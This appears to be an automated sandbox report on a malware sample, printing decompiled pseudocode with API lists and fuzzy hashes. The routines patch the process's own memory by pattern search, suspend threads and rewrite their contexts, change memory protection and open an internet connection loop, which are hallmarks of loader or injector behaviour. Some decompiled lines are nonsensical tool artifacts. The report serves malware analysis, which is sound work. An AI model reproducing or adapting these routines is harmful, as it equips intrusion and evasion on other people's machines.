                                                                                                                        				intOrPtr _t52;
                                                                                                                        
                                                                                                                        				_t31 = 0;
                                                                                                                        				_v80 = 0;
                                                                                                                        				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
                                                                                                                        				if(_v28 <= 0) {
                                                                                                                        					return _t26;
                                                                                                                        				} else {
                                                                                                                        					_t52 = _v12;
                                                                                                                        					_t42 = _v4;
                                                                                                                        					do {
                                                                                                                        						_push(0x1c);
                                                                                                                        						_push( &_v88);
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_t47 = 0;
                                                                                                                        						_v108 = 0;
                                                                                                                        						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
                                                                                                                        						if(_t28 >= 0 && _v128 == 0x1c) {
                                                                                                                        							_t32 = _v116;
                                                                                                                        							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
                                                                                                                        								while(1) {
                                                                                                                        									_t28 = _t47 + _t32;
                                                                                                                        									__imp__RtlCompareMemory(_t52, _t28, _t42);
                                                                                                                        									if(_t28 == _t42) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									_t47 = _t47 + 1;
                                                                                                                        									if(_t47 < _v116 - _t42) {
                                                                                                                        										continue;
                                                                                                                        									}
                                                                                                                        									goto L11;
                                                                                                                        								}
                                                                                                                        								_t44 = _v40;
                                                                                                                        								_t49 = _t47 + _t32;
                                                                                                                        								_v132 = 0;
                                                                                                                        								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
                                                                                                                        								_push(_t44);
                                                                                                                        								_push(_t49);
                                                                                                                        								_push(0xffffffff);
                                                                                                                        								L6F33C336();
                                                                                                                        								return _t30;
                                                                                                                        							}
                                                                                                                        							L11:
                                                                                                                        							_t31 = _t32 + _v104;
                                                                                                                        						}
                                                                                                                        					} while (_t31 < _v56);
                                                                                                                        					return _t28;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F338417
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001C), ref: 6F338438
                                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6F338453
                                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 6F338496
                                                                                                                        • NtWriteVirtualMemory.NTDLL ref: 6F3384DD
                                                                                                                        • NtFlushInstructionCache.NTDLL ref: 6F3384E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 145697856-0
                                                                                                                        • Opcode ID: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction ID: 0080b3b2eed9b717a3d3651d1a67a4fb6ea759cc3e924ad000adc7748528338a
                                                                                                                        • Opcode Fuzzy Hash: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction Fuzzy Hash: B02191735083A4AFD210DE55DC80EABBBE9EFC47B4F440B1DF59486180C775E5458B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000050,0049B33F,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?), ref: 0049B50A
                                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049B53B
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AcquireContextCryptErrorExceptionException@8H_prolog3H_prolog3_catchLastRaiseThrow_malloc
                                                                                                                        • String ID: CryptAcquireContext
                                                                                                                        • API String ID: 3486300381-714834122
                                                                                                                        • Opcode ID: 9c6a205f110786291e9a80d2f64064bf27fcdafd48b42f2ec411cbc90d7bb92d
                                                                                                                        • Instruction ID: 4aa91081fb9cf29067d9f316b913320168a5be26f9ed3d768d26055c8915dce9
                                                                                                                        • Opcode Fuzzy Hash: 9c6a205f110786291e9a80d2f64064bf27fcdafd48b42f2ec411cbc90d7bb92d
                                                                                                                        • Instruction Fuzzy Hash: 2811E770909355AAEB10DFE8ED89BAF7FA8FB01704F08442EF101D7282C7B95E448794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                                          • Part of subcall function 0049B4A0: __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049B379
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CryptErrorExceptionException@8H_prolog3_catchLastRaiseRandomThrow
                                                                                                                        • String ID: CryptGenRandom
                                                                                                                        • API String ID: 3896132652-3616286655
                                                                                                                        • Opcode ID: 55599ae50852dde39a2b350bae986ab6efdd030da4e79697fed3590d4eace3be
                                                                                                                        • Instruction ID: 0b8e54217ba43ac14e11ff312a9233512deb590aa70a2d3a4b8af42d778110ac
                                                                                                                        • Opcode Fuzzy Hash: 55599ae50852dde39a2b350bae986ab6efdd030da4e79697fed3590d4eace3be
                                                                                                                        • Instruction Fuzzy Hash: CFF01C72900109AADF00EBE0D94AFDD7B7CEF58315F40842AF601E6151DB7C96088B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B270(void** _a4) {
                                                                                                                        				void* _t6;
                                                                                                                        				void* _t7;
                                                                                                                        				void** _t13;
                                                                                                                        				signed int _t17;
                                                                                                                        				void* _t20;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t13 = _a4;
                                                                                                                        				if( *_t13 != 0) {
                                                                                                                        					_t17 = 0;
                                                                                                                        					if(_t13[2] <= 0) {
                                                                                                                        						L7:
                                                                                                                        						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
                                                                                                                        						return HeapFree(_t7, 0,  *_t13);
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						_t20 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
                                                                                                                        						_t22 = _t22 + 0xc;
                                                                                                                        						if(_t20 != 0) {
                                                                                                                        							NtResumeThread(_t20, 0); // executed
                                                                                                                        							NtClose(_t20); // executed
                                                                                                                        						}
                                                                                                                        						_t17 = _t17 + 1;
                                                                                                                        						_t5 =  &(_t13[2]); // 0xc30cc483
                                                                                                                        					} while (_t17 <  *_t5);
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				return _t6;
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • HeapFree.KERNEL32(02700000,00000000,?,00000000,?,6F33B44C,?,74784970,00000000), ref: 6F33B2BB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33B29E
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B2A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3496683721-0
                                                                                                                        • Opcode ID: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction ID: 1110496f906885189f1328f8116ef6c67dc1c1d5a7e4159772a5dde71de7bcf8
                                                                                                                        • Opcode Fuzzy Hash: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction Fuzzy Hash: E9F05E32A41A70AFDB11EA54CC81F5A33A9AB89751F104255F904EF285CB75BC42CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33AFC0(signed int __eax, void* _a4, intOrPtr _a8) {
                                                                                                                        				void* _v0;
                                                                                                                        				long _v536;
                                                                                                                        				intOrPtr _v540;
                                                                                                                        				struct _CONTEXT _v716;
                                                                                                                        				struct _CONTEXT _v720;
                                                                                                                        				void* __edi;
                                                                                                                        				long _t16;
                                                                                                                        				intOrPtr _t19;
                                                                                                                        				long _t20;
                                                                                                                        				signed int _t27;
                                                                                                                        				void* _t30;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				long _t37;
                                                                                                                        				signed int _t39;
                                                                                                                        				void* _t40;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        
                                                                                                                        				_t41 = _a8;
                                                                                                                        				_t39 = __eax;
                                                                                                                        				_v716 = 0x10001;
                                                                                                                        				_t16 = NtGetContextThread(_a4,  &_v716); // executed
                                                                                                                        				if(_t16 < 0) {
                                                                                                                        					L19:
                                                                                                                        					return _t16;
                                                                                                                        				}
                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                        					_t16 = _t39 + 1;
                                                                                                                        				} else {
                                                                                                                        					_t16 =  *0x6f340958; // 0x1f
                                                                                                                        					_t39 = 0;
                                                                                                                        				}
                                                                                                                        				if(_t39 >= _t16) {
                                                                                                                        					goto L19;
                                                                                                                        				} else {
                                                                                                                        					_t27 = _t39 * 0x2c;
                                                                                                                        					_t37 = _v536;
                                                                                                                        					_t40 = _t16 - _t39;
                                                                                                                        					do {
                                                                                                                        						_t32 =  *0x6f340950; // 0x27005a8
                                                                                                                        						_t19 = _t41;
                                                                                                                        						_t30 = _t27 + _t32;
                                                                                                                        						if(_t19 == 0) {
                                                                                                                        							_t20 = 0;
                                                                                                                        						} else {
                                                                                                                        							if(_t19 == 1) {
                                                                                                                        								_t20 = 1;
                                                                                                                        							} else {
                                                                                                                        								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
                                                                                                                        							if(_t20 == 0) {
                                                                                                                        								_t20 = E6F33AF50(_t30, _t37);
                                                                                                                        							} else {
                                                                                                                        								_t20 = E6F33AF90(_t30, _t37);
                                                                                                                        							}
                                                                                                                        							if(_t20 != 0) {
                                                                                                                        								_v536 = _t20;
                                                                                                                        								_t20 = NtSetContextThread(_v0,  &_v720);
                                                                                                                        								_t37 = _v540;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t27 = _t27 + 0x2c;
                                                                                                                        						_t40 = _t40 - 1;
                                                                                                                        					} while (_t40 != 0);
                                                                                                                        					return _t20;
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        0x00000000
                                                                                                                        0x6f33b090

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction ID: 59cad453644579db8a67e217b24814fed65208902995dc2cc9b906cd707c02dc
                                                                                                                        • Opcode Fuzzy Hash: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction Fuzzy Hash: C221EE33A087F54BD720DB68C9807AA77D9EB85350F40062AD4B4CB180D735E94587A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B1F0(long** __eax, intOrPtr _a4) {
                                                                                                                        				signed int _v0;
                                                                                                                        				void* __esi;
                                                                                                                        				long _t10;
                                                                                                                        				signed int _t16;
                                                                                                                        				void* _t21;
                                                                                                                        				intOrPtr* _t23;
                                                                                                                        				void* _t24;
                                                                                                                        
                                                                                                                        				_t23 = __eax;
                                                                                                                        				 *__eax = 0;
                                                                                                                        				__eax[1] = 0;
                                                                                                                        				__eax[2] = 0;
                                                                                                                        				_t10 = E6F33B0A0(__eax);
                                                                                                                        				if( *_t23 != 0) {
                                                                                                                        					_t16 = 0;
                                                                                                                        					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
                                                                                                                        						L7:
                                                                                                                        						return _t10;
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						_t10 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
                                                                                                                        						_t21 = _t10;
                                                                                                                        						_t24 = _t24 + 0xc;
                                                                                                                        						if(_t21 != 0) {
                                                                                                                        							NtSuspendThread(_t21, 0); // executed
                                                                                                                        							E6F33AFC0(_v0, _t21, _a4);
                                                                                                                        							_t24 = _t24 + 8;
                                                                                                                        							_t10 = NtClose(_t21);
                                                                                                                        						}
                                                                                                                        						_t16 = _t16 + 1;
                                                                                                                        					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				return _t10;
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                          • Part of subcall function 6F33B0A0: HeapAlloc.KERNEL32(02700000,00000000,00000200), ref: 6F33B16A
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtSuspendThread.NTDLL(00000000,00000000), ref: 6F33B23B
                                                                                                                          • Part of subcall function 6F33AFC0: NtGetContextThread.NTDLL ref: 6F33AFE6
                                                                                                                          • Part of subcall function 6F33AFC0: NtSetContextThread.NTDLL ref: 6F33B07D
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B253
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213046356-0
                                                                                                                        • Opcode ID: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction ID: 04efed0e7fd23f17494e9e287c7278ae8680cabaab1548e4dac6af3f4c6b1888
                                                                                                                        • Opcode Fuzzy Hash: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction Fuzzy Hash: 7701FF7A9007659BD320CF14E8C0B6BB3E4AF80709F20462DE9958B280D3B57845CA62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33AD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				void* _t71;
                                                                                                                        				long _t97;
                                                                                                                        
                                                                                                                        				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
                                                                                                                        				 *__ebx =  *__ebx + _t71;
                                                                                                                        				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
                                                                                                                        				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
                                                                                                                        				_push(__ecx);
                                                                                                                        				_v4 = _a4;
                                                                                                                        				_a4 = _a8;
                                                                                                                        				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
                                                                                                                        				return 0 | _t97 > 0x00000000;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction ID: 6de7b3b9f436ebfc59c6c26f42391e41fc78e96b05a2420a815dc052ffe9dcf1
                                                                                                                        • Opcode Fuzzy Hash: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction Fuzzy Hash: 49F0FE761083519FC705CF58CC92A5A77E4AF9A710B148A5DE0A5C7684D730E414DB23
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F3382F0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                        				intOrPtr _t12;
                                                                                                                        				signed int _t15;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				signed char* _t19;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        
                                                                                                                        				_t12 = _a8;
                                                                                                                        				_t27 = _a4;
                                                                                                                        				_push(_t12);
                                                                                                                        				_push(_t27); // executed
                                                                                                                        				M6F340600(); // executed
                                                                                                                        				_t18 = _t12;
                                                                                                                        				if(_t27 != 0 && _t18 == 0) {
                                                                                                                        					do {
                                                                                                                        						if( *((intOrPtr*)(_t27 + 0x190)) <= 3) {
                                                                                                                        							goto L6;
                                                                                                                        						}
                                                                                                                        						_t19 = _t27 + 0x197;
                                                                                                                        						do {
                                                                                                                        							_t15 = ( *_t19 & 0x000000ff) + M6F3404BC + M6F3404E4;
                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                        							 *((char*)(_t19 - 1)) = _t15 % 0xff;
                                                                                                                        						} while (0xfffffe6c + _t19 <  *((intOrPtr*)(_t27 + 0x190)));
                                                                                                                        						L6:
                                                                                                                        						_t27 =  *_t27;
                                                                                                                        					} while (_t27 != 0);
                                                                                                                        					return _t18;
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6F3382FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AdaptersInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177971545-0
                                                                                                                        • Opcode ID: ee61f07b029e858cfd4bd5b341b8e7d4da8ef7fb06ddbef56b479880b18d98b4
                                                                                                                        • Instruction ID: ed9d7500124e4a7573094c9b3134be4986b01b8681d55c9cca2cccdd3bf927a3
                                                                                                                        • Opcode Fuzzy Hash: ee61f07b029e858cfd4bd5b341b8e7d4da8ef7fb06ddbef56b479880b18d98b4
                                                                                                                        • Instruction Fuzzy Hash: 9A01F43BA09A608FC311DA1CC8909EBF3ADBF96374F09452EE995C7300C772B8058790
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33ADE0(long _a4, long _a8, long _a12, long* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				long _t13;
                                                                                                                        
                                                                                                                        				_v4 = _a4;
                                                                                                                        				_a4 = _a8;
                                                                                                                        				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
                                                                                                                        				return 0 | _t13 > 0x00000000;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction ID: b78477e4b6319e3045174737d7de5677868566ed5ca31fd5eddb96b3805b58a4
                                                                                                                        • Opcode Fuzzy Hash: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction Fuzzy Hash: B9E0BFB620C342AF8748CF58D951C5BB3E8ABC8720F10CA1DB1BAC3690D730D8088B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F335690() {
                                                                                                                        				char* _t71;
                                                                                                                        				void* _t82;
                                                                                                                        				long _t87;
                                                                                                                        				int _t93;
                                                                                                                        				void* _t100;
                                                                                                                        				intOrPtr _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t104;
                                                                                                                        				void* _t105;
                                                                                                                        				void* _t107;
                                                                                                                        				void* _t108;
                                                                                                                        				void* _t109;
                                                                                                                        				void* _t111;
                                                                                                                        				CHAR* _t114;
                                                                                                                        				int _t115;
                                                                                                                        				long _t116;
                                                                                                                        				long _t119;
                                                                                                                        				void* _t122;
                                                                                                                        				intOrPtr _t146;
                                                                                                                        				void* _t147;
                                                                                                                        				void* _t149;
                                                                                                                        				intOrPtr _t150;
                                                                                                                        				void* _t151;
                                                                                                                        				void* _t152;
                                                                                                                        				int _t153;
                                                                                                                        				intOrPtr _t154;
                                                                                                                        				void* _t156;
                                                                                                                        				void* _t157;
                                                                                                                        
                                                                                                                        				 *((intOrPtr*)(_t156 + 0x20)) = 0;
                                                                                                                        				 *(_t156 + 0x1c) = 0;
                                                                                                                        				_t3 = GetTickCount() + 0x493e0; // 0x493e0
                                                                                                                        				_t146 = _t3;
                                                                                                                        				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
                                                                                                                        				while(1) {
                                                                                                                        					_t150 =  *((intOrPtr*)(_t156 + 0x40));
                                                                                                                        					 *(_t156 + 0x18) = 0x842a0000;
                                                                                                                        					if( *(_t150 + 0xc) != 0) {
                                                                                                                        						 *(_t156 + 0x18) = 0x84aa3300;
                                                                                                                        					}
                                                                                                                        					_t71 = M6F340518; // 0x749bb0
                                                                                                                        					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
                                                                                                                        					 *(_t156 + 0x30) = _t152;
                                                                                                                        					if(_t152 == 0) {
                                                                                                                        						L28:
                                                                                                                        						if(GetTickCount() >= _t146) {
                                                                                                                        							L32:
                                                                                                                        							return  *((intOrPtr*)(_t156 + 0x20));
                                                                                                                        						}
                                                                                                                        						Sleep(0x1388);
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
                                                                                                                        					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
